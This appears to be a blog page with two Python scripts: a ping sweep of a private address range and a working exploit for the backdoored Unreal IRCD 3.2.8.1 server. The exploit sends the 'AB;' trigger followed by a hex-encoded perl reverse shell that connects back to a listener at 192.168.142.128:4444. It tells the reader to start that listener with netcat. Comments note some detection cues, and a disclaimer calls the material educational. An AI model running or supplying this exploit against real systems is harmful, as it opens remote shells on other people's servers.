python

ping sweeping with python

This simple script demonstrates how to do a ping sweep with Python.

For some reason, WordPress really messed up the indentation… Still working on it…

import subprocess

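# Ping sweep: send one ICMP echo request to every address in a small range
# and report which ones answered.
#
# Reading the results: "not alive" only means ping exited non-zero. A host
# that drops ICMP echo at its firewall is reported as not alive, so the
# final list is a lower bound on what is actually on the network.
# On the wire this looks like a burst of echo requests from one source to
# consecutive addresses, which is what sweep-detection rules key on.

host = "192.168.%d.%d"  # change this: template for the addresses to probe

# argv prefix for a single echo request with a one-second limit. The flags
# are the ones used on the page; the meaning of -w differs between ping
# implementations, so check the local man page.
# Passing a list (no shell=True) keeps the address out of a shell command
# line, which matters as soon as the address stops being hard-coded.
# Unlike the shell form, a missing ping binary now raises OSError instead
# of being counted as "not alive".
command = ["ping", "-c", "1", "-w", "1"]
result = []

for x in range(188, 189):  # change this: third octet
    for y in range(125, 130):  # change this: fourth octet
        ip = host % (x, y)
        try:
            # Output is captured only to keep ping quiet; the exit status
            # alone decides the outcome.
            subprocess.check_output(command + [ip], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError:
            print("Host %s is not alive" % ip)
        else:
            result.append(ip)
            print("Host %s is alive" % ip)

# Single-argument print(...) behaves the same on Python 2 and Python 3.
print("===Done===")
if result:
    print("There is %d host(s) alive" % len(result))
    for alive in result:
        print(alive)
else:
    print("Found no alive host")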

unreal IRCD 3.2.8.1 standalone exploit based on Metasploit

*All credit goes to Rapid7

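This is an Unreal IRCD 3.2.8.1 backdoor command execution exploit, written in Python, based on an exploit module from the Metasploit Framework. The backdoor was shipped in a tampered copy of the 3.2.8.1 source archive, so checking the downloaded archive against the project's published signature or checksum is how a defender rules it out.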

You still need msfvenom to generate the payload.

This shit is too old to cause any real damage, but still —

—Disclaimer: For education purposes only. Use it at your own risk, don’t blame me for anything.


# Proof-of-concept client for the backdoored Unreal IRCD 3.2.8.1 build.
# It opens one TCP connection to the IRC port and sends a single line made
# of the marker "AB;" followed by a command string.
#
# What a defender can look for, based on what this script does:
#   - an inbound line on the IRC port that starts with "AB;"
#   - the IRC daemon spawning perl or a shell (NOTE(review): the daemon-side
#     behaviour is not shown on this page; confirm against the advisory)
#   - an outbound TCP connection from the IRC host to an unexpected address
#
#Open a netcat listener before running this code: nc -nlvp 4444
#Or you can use exploit/multi/handler of metasploit framework
#to listen to the reverse shell

import sys,socket
target_ip="192.168.142.129" #change this (lab address of the IRC server)
target_port=6667 #dont change this (IRC port the script connects to)

#payload: cmd/unix/reverse_perl
#encoder:cmd/perl
#Change this payload before running this exploit
# The bytes below are hex-escaped ASCII text, not machine code: they spell a
# perl command line. The callback address and port are fixed inside that
# text, separately from target_ip above.
buf =""
buf += "\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20"
buf += "\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74"
buf += "\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61"
buf += "\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65"
buf += "\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24"
buf += "\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28"
buf += "\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b"
buf += "\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e"
buf += "\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74"
buf += "\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64"
buf += "\x64\x72\x2c\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31"
buf += "\x34\x32\x2e\x31\x32\x38\x3a\x34\x34\x34\x34\x22\x29"
buf += "\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65"
buf += "\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66"
buf += "\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77"
buf += "\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24"
buf += "\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73"
buf += "\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27"

# Alias only; the string is sent as text and never executed locally.
shellcode= buf

#TCP client
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#connect client to target
client.connect((target_ip,target_port))

#send shellcode to target
# One newline-terminated line: the "AB;" marker, then the command text.
# Python 2 only: send() is given a str here, which Python 3 rejects.
# The return value of send() is not checked and the socket is never closed.
client.send("AB;"+ shellcode +"\n")